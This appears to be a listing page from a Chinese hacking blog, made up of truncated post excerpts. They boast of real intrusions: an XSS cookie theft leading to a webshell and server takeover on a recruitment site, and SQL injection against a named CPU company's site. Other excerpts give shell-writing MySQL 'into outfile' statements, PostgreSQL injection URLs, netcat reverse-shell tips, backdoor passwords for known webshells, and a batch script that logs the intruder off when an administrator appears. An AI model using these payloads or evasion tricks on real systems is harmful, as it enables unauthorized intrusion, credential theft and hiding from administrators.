误入网络管理机房

外的收获: 最近跨站传得火热,追随潮流,初研跨站攻击,意外地得到某人才招聘网留言板管理员cookie,cookie中有MD5加密后的密码,在http://www.cmd5.com成功解密。运气真是好到了家,利用域名+该密码成功地进入了FTP,上传大写,就这样忽悠到了webshell。服务器中serv-u默认密码虽改,但安装目录有更改权限,简单添加FTP管理员,顺利得到服务器FTP管理员权限,在网站...

- 阅读全文 -

Mysql root导shell

Select '' into outfile 'E:/wwwroot/china/eval.php';//导shell,访问报错,详情不解select load_file('E:/wwwroot/china/eval.php');//读shell,检查shell完整性http://www.xxxxxxx.cn/eval.php 经过asc码格式导成功了。连接密码,cmd select concat...

- 阅读全文 -

常见的黑客们的后门密码

  r00ts小组 密码:r00ts   组超强功能修正去后门加强S-U提权版 密码hkk007   火狐asp木马(超强版)” 华夏五周年庆典版 密码wrsk   **(中国数据) 密码rinima   asp 黑客→kissy 密码ceshi2009   Evil sadness 密码5201314   F.S.T 联盟交流群内部版.!别外传噢 密码rfkl   username 密码8473...

- 阅读全文 -

ASP探测本地端口之MSWINSCK.OCX方案

这个方法很鸡肋,需要服务器有编程环境,mswinsck属于VB控件,装了VC或者VS也行,否则是没有注册的。作为一种思路吧。 MSWINSCK.OCX里的方法可以用来主动连接,但是可能由于本人的ASP功底不够吧,始终没有实现使用Connect方法探测任意IP地址的端口,希望有高人能够写出来代码并能共享出来。 测试环境:Windows 2003 企业版 SP2 IIS 6.0 测试代码: <%...

- 阅读全文 -

内网嗅探自我保护用到的批处理

检测管理员上线就注销自已:   @echo off   :check   choice /C YN /T 10 /D Y   quser find "#16" && del xx.bat logoff   goto check   #16 每次运行这个 bat 的时候先quser 一下,看当前的会话id 是多少,然后加1 每连接一次就会加1。以上适应使用管理员帐号时。   ----...

- 阅读全文 -

使用NC反弹Shell

今日中午有某牛牛问我如何使用NC反弹拿shell当时真是冷汗直冒!哎,郁闷,正好此时有空就写出来供某牛牛和小菜们学习一下! 使用NC反弹Shell 在进行Shell反弹时,有时会碰到服务器不支持PHP或者WebShell无法成功反弹Shell的情况,例如有的服务器只支持JSP,不支持PHP。此时,可以同样采用Windows下的经典的NC反弹Shell方法。 在Windows下反弹CmdShell时...

- 阅读全文 -

PostgreSQL 注入整理

5432端口 /*order by猜字段数*/ http://webshell.cc/detail.php?id=236+order+by+26-- /*判断postgresql数据库*/ http://webshell.cc/detail.php?id=236+and+1::int=1-- /*通过cast类型转换来暴postgresql信息*/ http://webshell.cc/detai...

- 阅读全文 -

php+MySql高级注入中国龙芯cpu公司网站

注入点,注入点猜解字段数目,这些我就不介绍了。注入的时候from猜不出表段名来,可以看这里:http://bbs.blackbap.org/viewthread.php?tid=1215 如果知道了表段名出不来字段名,可以看这里: http://bbs.blackbap.org/viewthread.php?tid=1220 除了这两种,本文再介绍两种MySql的高级注入语句。 先说一个最简单的c...

- 阅读全文 -